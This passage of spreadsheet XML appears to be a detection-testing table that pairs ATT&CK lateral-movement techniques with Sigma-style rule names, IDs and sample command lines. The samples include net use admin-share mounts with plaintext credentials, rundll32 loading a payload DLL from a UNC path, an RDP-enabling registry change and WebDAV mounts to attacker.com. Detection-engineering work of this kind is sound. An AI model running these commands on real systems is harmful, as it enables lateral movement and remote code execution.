        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F212" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G212" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H212" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I212" s="43" t="n"/>
      <c r="J212" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K212" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B213" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C213" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D213" s="43" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E213" s="43" t="inlineStr">
        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F213" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G213" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H213" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I213" s="43" t="n"/>
      <c r="J213" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K213" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B214" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C214" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D214" s="43" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E214" s="43" t="inlineStr">
        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator /persistent:no</t>
        </is>
      </c>
      <c r="F214" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G214" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H214" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I214" s="43" t="n"/>
      <c r="J214" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K214" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B215" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C215" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D215" s="43" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E215" s="43" t="inlineStr">
        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator /y</t>
        </is>
      </c>
      <c r="F215" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G215" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H215" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I215" s="43" t="n"/>
      <c r="J215" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K215" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B216" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C216" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D216" s="43" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E216" s="43" t="inlineStr">
        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator /Y</t>
        </is>
      </c>
      <c r="F216" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G216" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H216" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I216" s="43" t="n"/>
      <c r="J216" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K216" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B217" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C217" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D217" s="43" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E217" s="43" t="inlineStr">
        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator /Y /TRANSPORT:QUIC /SKIPCERTCHECK /LOGONDOMAIN:DOMAIN /LOGONWORKSTATION:WORKSTATION</t>
        </is>
      </c>
      <c r="F217" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G217" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H217" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I217" s="43" t="n"/>
      <c r="J217" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K217" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B218" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C218" s="43" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D218" s="43" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E218" s="43" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\\user password123 /add</t>
        </is>
      </c>
      <c r="F218" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G218" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H218" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I218" s="43" t="n"/>
      <c r="J218" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K218" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B219" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C219" s="43" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D219" s="43" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E219" s="43" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\user password123 /add</t>
        </is>
      </c>
      <c r="F219" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G219" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H219" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I219" s="43" t="n"/>
      <c r="J219" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K219" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B220" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C220" s="43" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D220" s="43" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E220" s="43" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\\user password123 /ADD</t>
        </is>
      </c>
      <c r="F220" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G220" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H220" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I220" s="43" t="n"/>
      <c r="J220" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K220" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B221" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C221" s="43" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D221" s="43" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E221" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F221" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G221" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H221" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I221" s="43" t="n"/>
      <c r="J221" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K221" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B222" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C222" s="43" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D222" s="43" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E222" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe '//192.168.1.1/share/payload.dll',EntryPoint</t>
        </is>
      </c>
      <c r="F222" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G222" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H222" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="43" t="n"/>
      <c r="J222" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K222" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B223" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C223" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D223" s="43" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E223" s="43" t="inlineStr">
        <is>
          <t>rundll32</t>
        </is>
      </c>
      <c r="F223" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G223" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H223" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I223" s="43" t="n"/>
      <c r="J223" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K223" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B224" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C224" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D224" s="43" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E224" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe #</t>
        </is>
      </c>
      <c r="F224" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G224" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H224" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I224" s="43" t="n"/>
      <c r="J224" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K224" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B225" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C225" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D225" s="43" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E225" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe not_rundll.exe &amp;&amp; not_rundll.exe</t>
        </is>
      </c>
      <c r="F225" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G225" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H225" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I225" s="43" t="n"/>
      <c r="J225" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K225" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B226" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C226" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D226" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E226" s="43" t="inlineStr">
        <is>
          <t>C:\\WINNT\\system32\\mmc.exe -Embedding</t>
        </is>
      </c>
      <c r="F226" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G226" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H226" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I226" s="43" t="n"/>
      <c r="J226" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K226" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B227" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C227" s="43" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D227" s="43" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E227" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mstsc.exe /v:THAIMX</t>
        </is>
      </c>
      <c r="F227" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G227" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H227" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I227" s="43" t="n"/>
      <c r="J227" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K227" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B228" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C228" s="43" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D228" s="43" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E228" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\mstsc.exe" /v:THAIMX</t>
        </is>
      </c>
      <c r="F228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="43" t="n"/>
      <c r="J228" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K228" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B229" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C229" s="43" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D229" s="43" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E229" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mstsc.exe -v:THAIMX</t>
        </is>
      </c>
      <c r="F229" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G229" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H229" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="43" t="n"/>
      <c r="J229" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K229" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B230" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C230" s="43" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D230" s="43" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E230" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mstsc.exe /v:THAIMX /f</t>
        </is>
      </c>
      <c r="F230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="43" t="n"/>
      <c r="J230" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K230" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B231" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C231" s="43" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D231" s="43" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E231" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mstsc.exe /v:THAIMX /f /span</t>
        </is>
      </c>
      <c r="F231" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G231" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H231" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="43" t="n"/>
      <c r="J231" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K231" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B232" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C232" s="43" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D232" s="43" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E232" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mstsc.exe /v:THAIMX /f /span /w:1024 /h:768 /public</t>
        </is>
      </c>
      <c r="F232" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G232" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H232" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I232" s="43" t="n"/>
      <c r="J232" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K232" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B233" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C233" s="43" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D233" s="43" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E233" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mstsc.exe /v:THAIMX /f /span /w:1024 /h:768 /public /admin</t>
        </is>
      </c>
      <c r="F233" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G233" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H233" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I233" s="43" t="n"/>
      <c r="J233" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K233" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="234" ht="15.75" customHeight="1" s="42">
      <c r="A234" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B234" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_remote_connection</t>
        </is>
      </c>
      <c r="C234" s="43" t="inlineStr">
        <is>
          <t>New Remote Desktop Connection Initiated Via Mstsc.EXE</t>
        </is>
      </c>
      <c r="D234" s="43" t="inlineStr">
        <is>
          <t>954f0af7-62dd-418f-b3df-a84bc2c7a774</t>
        </is>
      </c>
      <c r="E234" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mstsc.exe /v:THAIMX /f /span /w:1024 /h:768 /public /admin /noconnect</t>
        </is>
      </c>
      <c r="F234" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G234" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H234" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I234" s="43" t="n"/>
      <c r="J234" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K234" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1" s="42">
      <c r="A235" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B235" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C235" s="43" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D235" s="43" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E235" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F235" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G235" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H235" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I235" s="43" t="n"/>
      <c r="J235" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K235" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="236" ht="15.75" customHeight="1" s="42">
      <c r="A236" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B236" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C236" s="43" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D236" s="43" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E236" s="43" t="inlineStr">
        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /user:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H236" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I236" s="43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236" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K236" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1" s="42">
      <c r="A237" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B237" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_internet_share</t>
        </is>
      </c>
      <c r="C237" s="43" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D237" s="43" t="inlineStr">
        <is>
          <t>7e6237fe-3ddb-438f-9381-9bf9de5af8d0</t>
        </is>
      </c>
      <c r="E237" s="43" t="inlineStr">
        <is>
          <t>net use Z: "http://attacker.com/share"</t>
        </is>
      </c>
      <c r="F237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H237" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I237" s="43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37" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K237" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="238" ht="15.75" customHeight="1" s="42">
      <c r="A238" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B238" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_internet_share</t>
        </is>
      </c>
      <c r="C238" s="43" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D238" s="43" t="inlineStr">
        <is>
          <t>7e6237fe-3ddb-438f-9381-9bf9de5af8d0</t>
        </is>
      </c>
      <c r="E238" s="43" t="inlineStr">
        <is>
          <t>net use Z: http://attacker.com/share</t>
        </is>
      </c>
      <c r="F238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H238" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I238" s="43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38" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K238" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1" s="42">
      <c r="A239" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B239" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_internet_share</t>
        </is>
      </c>
      <c r="C239" s="43" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D239" s="43" t="inlineStr">
        <is>
          <t>7e6237fe-3ddb-438f-9381-9bf9de5af8d0</t>
        </is>
      </c>
      <c r="E239" s="43" t="inlineStr">
        <is>
          <t>net use Z: "http://attacker.com/share" /user:username</t>
        </is>
      </c>
      <c r="F239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H239" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I239" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J239" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K239" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1" s="42">
      <c r="A240" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B240" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_internet_share</t>
        </is>
      </c>
      <c r="C240" s="43" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D240" s="43" t="inlineStr">
        <is>
          <t>7e6237fe-3ddb-438f-9381-9bf9de5af8d0</t>
        </is>
      </c>
      <c r="E240" s="43" t="inlineStr">
        <is>
          <t>net use Z: http://attacker.com/share /persistent:no</t>
        </is>
      </c>
      <c r="F240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H240" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I240" s="43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40" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K240" s="43" t="b">
        <v>0</v>
      </c>
    </row>
